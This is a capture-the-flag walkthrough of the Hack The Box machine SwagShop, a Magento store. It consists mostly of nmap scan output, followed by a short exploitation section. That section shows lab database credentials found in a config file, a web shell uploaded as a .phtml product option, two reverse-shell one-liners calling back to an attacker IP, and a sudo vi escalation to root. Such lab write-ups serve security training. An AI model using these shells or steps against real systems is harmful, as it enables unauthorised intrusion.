Home SwagShop
Post
Cancel

SwagShop

Link of the box: SwagShop

Enumeration (NMAP)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
nmap -n -vvv -p- -T5 --min-rate 5000 10.10.10.140 -oN ports                                                                                                           
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-16 22:04 EST
Initiating Ping Scan at 22:04
Scanning 10.10.10.140 [2 ports]
Completed Ping Scan at 22:04, 0.17s elapsed (1 total hosts)
Initiating Connect Scan at 22:04
Scanning 10.10.10.140 [65535 ports]
Discovered open port 80/tcp on 10.10.10.140
Discovered open port 22/tcp on 10.10.10.140
Warning: 10.10.10.140 giving up on port because retransmission cap hit (2).
Increasing send delay for 10.10.10.140 from 0 to 5 due to 239 out of 597 dropped probes since last increase.
Completed Connect Scan at 22:04, 29.15s elapsed (65535 total ports)
Nmap scan report for 10.10.10.140
Host is up, received conn-refused (0.16s latency).
Scanned at 2021-11-16 22:04:05 EST for 29s
Not shown: 39556 closed ports, 25977 filtered ports
Reason: 39556 conn-refused and 25977 no-responses
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 29.39 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
nmap -sC -sV -p22,80 10.10.10.140 -oN scan
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-16 22:05 EST
Nmap scan report for 10.10.10.140
Host is up (0.17s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://swagshop.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.24 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
# Nmap 7.91 scan initiated Tue Nov 16 22:06:45 2021 as: nmap --script vuln -oN vulns 10.10.10.140
Nmap scan report for swagshop.htb (10.10.10.140)
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=swagshop.htb
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://swagshop.htb:80/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=48dnsh50a7k5br9n6c2vv7au40
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: login-form
|     Form action: http://swagshop.htb/index.php/customer/account/loginPost/
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=afnf9a3d5ans7dq7cqokrdp703
|     
|     Path: http://swagshop.htb:80/index.php/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=ut0kd83am1ratf4qiju2a57rs3
|     
|     Path: http://swagshop.htb:80/index.php/?SID=48dnsh50a7k5br9n6c2vv7au40contacts/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/?SID=48dnsh50a7k5br9n6c2vv7au40contacts/
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=rs4akd4co3qa2b5rn8qpb5u5m4
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: login-form
|     Form action: http://swagshop.htb/index.php/customer/account/loginPost/
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=afnf9a3d5ans7dq7cqokrdp703
|     
|     Path: http://swagshop.htb:80/index.php/?SID=48dnsh50a7k5br9n6c2vv7au40customer-service/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/?SID=48dnsh50a7k5br9n6c2vv7au40customer-service/
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=9l345cnlnci8klqa140kji6j11
|     
|     Path: http://swagshop.htb:80/index.php/hack-the-box-logo-t-shirt.html?SID=48dnsh50a7k5br9n6c2vv7au40
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/hack-the-box-logo-t-shirt.html?SID=48dnsh50a7k5br9n6c2vv7au40
|     Form id: product_addtocart_form
|     Form action: http://swagshop.htb/index.php/checkout/cart/add/uenc/aHR0cDovL3N3YWdzaG9wLmh0Yi9pbmRleC5waHAvaGFjay10aGUtYm94LWxvZ28tdC1zaGlydC5odG1sP1NJRD00OGRuc2g1MGE3azVicjluNmMydnY3YXU0MCZfX19TSUQ9VQ,,/product/1/form_key/iXyAOPHWUI3nuSy8/
|     
|     Path: http://swagshop.htb:80/index.php/hack-the-box-logo-t-shirt.html?SID=48dnsh50a7k5br9n6c2vv7au40
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=48dnsh50a7k5br9n6c2vv7au40
|     
|     Path: http://swagshop.htb:80/index.php/?SID=48dnsh50a7k5br9n6c2vv7au40about-magento-demo-store/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/?SID=48dnsh50a7k5br9n6c2vv7au40about-magento-demo-store/
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=dpbvakor0qpv7bjr39u9ig8b11
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: login-form
|     Form action: http://swagshop.htb/index.php/customer/account/loginPost/
|     
|     Path: http://swagshop.htb:80/index.php/customer/account/login/
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=afnf9a3d5ans7dq7cqokrdp703
|     
|     Path: http://swagshop.htb:80/index.php/catalogsearch/advanced/?SID=48dnsh50a7k5br9n6c2vv7au40
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/catalogsearch/advanced/?SID=48dnsh50a7k5br9n6c2vv7au40
|     Form id: form-validate
|     Form action: http://swagshop.htb/index.php/catalogsearch/advanced/result/
|     
|     Path: http://swagshop.htb:80/index.php/catalogsearch/advanced/?SID=48dnsh50a7k5br9n6c2vv7au40
|     Form id: newsletter-validate-detail
|     Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=48dnsh50a7k5br9n6c2vv7au40
|     
|     Path: http://swagshop.htb:80/index.php/?SID=48dnsh50a7k5br9n6c2vv7au40privacy-policy-cookie-restriction-mode/
|     Form id: search_mini_form
|     Form action: http://swagshop.htb/index.php/catalogsearch/result/
|     
|     Path: http://swagshop.htb:80/index.php/?SID=48dnsh50a7k5br9n6c2vv7au40privacy-policy-cookie-restriction-mode/
|     Form id: newsletter-validate-detail
|_    Form action: http://swagshop.htb/index.php/newsletter/subscriber/new/?SID=k7fhmt188lptklt23d0n8oiu44
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /app/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|   /errors/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|   /includes/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_  /lib/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

 Nmap done at Tue Nov 16 22:12:41 2021 -- 1 IP address (1 host up) scanned in 355.85 seconds

Exploitation

The first thing we notice from the dirbuster was a http://10.10.10.140/app/ folder, inside the folder we can find mysql creds http://10.10.10.140/app/etc/local.xml

1
2
<username>root</username>
<password>fMVWh7bDHpgZkyfqQXreTjU9</password>

Image

There’s a utility to scan magento’s instances: https://github.com/steverobbins/magescan

The output of the scan gave us a version number that is actually exploitable.

Image

1
2
sudo pip install mechanize 
python 37811 http://swagshop.htb/ "pwd"

But we need admin creds for this.

Fortunatelly there’s an exploit that let us create admin user

Image

We can use the following blog that explains how to get RCE to Magento.

https://blog.scrt.ch/2019/01/24/magento-rce-local-file-read-with-low-privilege-admin-rights/

We go to our admin panel -> Catalog -> Manage Products -> Edit any product -> Add a new File -> Add the .phtml file field -> Go to the product and upload the RCE with the extension .phtml. Now we should get RCE because the file is on the system.

Image Image Image Image Image Image

1
http://swagshop.htb/media/custom_options/quote/e/m/76c52451d8a21467e209897a02e3dd83.phtml?cmd=whoami

Image

We can now run the reverse shell.

1
2
3
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.31 4444 >/tmp/f

bash -c 'bash -i >& /dev/tcp/10.10.14.31/4444 0>&1'

We notice that we have root access for vi in the /var/www/html folder and got root easily sudo /usr/bin/vi /var/www/html/bash.sh

Image

This post is licensed under CC BY 4.0 by the author.